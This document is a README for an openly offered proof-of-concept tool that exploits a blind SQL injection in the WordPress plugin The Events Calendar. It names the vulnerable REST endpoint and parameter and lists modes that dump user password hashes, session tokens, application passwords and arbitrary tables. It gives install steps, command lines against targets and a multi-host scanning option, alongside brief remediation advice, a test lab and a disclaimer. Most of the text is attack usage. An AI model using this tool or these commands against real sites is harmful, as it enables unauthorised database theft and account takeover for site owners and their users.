Exploit for CVE-2026-49772

## https://sploitus.com/exploit?id=4DC88245-D5D6-582C-AA2B-EE9293E136F3
The Events Calendar SQL Injection (CVE-2026-49772) PoC


    
    
      
    


## Description

CVE-2026-49772 is an **unauthenticated blind SQL injection** in the WordPress
plugin **The Events Calendar**. A broken REST parameter validator (`validate_callback`
returns a closure instead of validating) lets the `order` parameter on the
experimental `tec/v1` REST API reach the SQL `ORDER BY` clause unsanitised:

```
GET /wp-json/tec/v1/events?orderby=event_date&order=
```

```sql
... ORDER BY event_date , wp_posts.post_date DESC ...
```

This is a **read-only** injection (no stacked queries, no writes, no direct output) —
but the whole database is extractable via a boolean/time-based oracle: user password
hashes, session tokens, application passwords, secret keys.

**Affected versions:** The Events Calendar `6.15.12` – `6.16.2` (fixed in `6.16.3`)
**Severity:** CVSS 3.1 `9.3` Critical — `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L`

## Features

- **`--check`** — Non-breaking detection: REST namespace, plugin version, time-based confirm
- **`--recon`** — DB fingerprint: version, current user, database, OS, privileges, table prefix
- **`--users`** — Dump `wp_users`: logins, emails, password hashes
- **`--user-meta`** — Dump `wp_usermeta`: session tokens, application passwords, capabilities
- **`--get-table`** — Dump any table with automatic column discovery
- **`--query`** — Extract the result of any scalar `SELECT`
- **Two oracles** — fast boolean (default) or time-based, multithreaded; no external dependencies

## Installation

Pure Python 3 standard library — `requirements.txt` is included for the standard
workflow but installs nothing extra.

### OSX / Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
```

### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
```

## Usage

```
python3 CVE-2026-49772.py   [options]
```

Pick exactly one action: `--check`, `--recon`, `--users`, `--user-meta`,
`--get-table `, `--query `. Run `--help` for all options.

---

### Vulnerability check
```bash
python3 CVE-2026-49772.py target.tld --check
```

### Database recon
```bash
python3 CVE-2026-49772.py target.tld --recon
```

### Dump users + password hashes
```bash
python3 CVE-2026-49772.py target.tld --users
```

### Extract a custom value
```bash
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
```

Tuning: `--technique boolean|time`, `--delay`, `--threads`, `--rows`, `--prefix`,
`--where`, `-useragent`, `-timeout`. Scan many hosts with `-l targets.txt`.

## Docker PoC

A self-contained Docker Compose lab with the vulnerable plugin (bundled, not
downloaded at boot) and pre-seeded events. See [docker/DOCKER.md](docker/DOCKER.md).

```bash
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
```

## Remediation

- Update The Events Calendar to **6.16.3** or later
- Until patched, block `/wp-json/tec/v1/` at the WAF / reverse proxy

## References

- [The Events Calendar](https://theeventscalendar.com/)
- [CVE.org — CVE-2026-49772](https://vulners.com/cve/CVE-2026-49772)
- [NVD — CVE-2026-49772](https://nvd.nist.gov/vuln/detail/CVE-2026-49772)
- [GitHub Advisory — GHSA-v796-wqfq-j4xh](https://github.com/advisories/GHSA-v796-wqfq-j4xh)
- [Patchstack — The Events Calendar SQL Injection](https://patchstack.com/database/wordpress/plugin/the-events-calendar/)

## Disclaimer

This tool is provided for educational and research purposes only. Use it only
against systems you own or have explicit written permission to test. The creator
assumes no responsibility for any misuse or damage caused by this tool.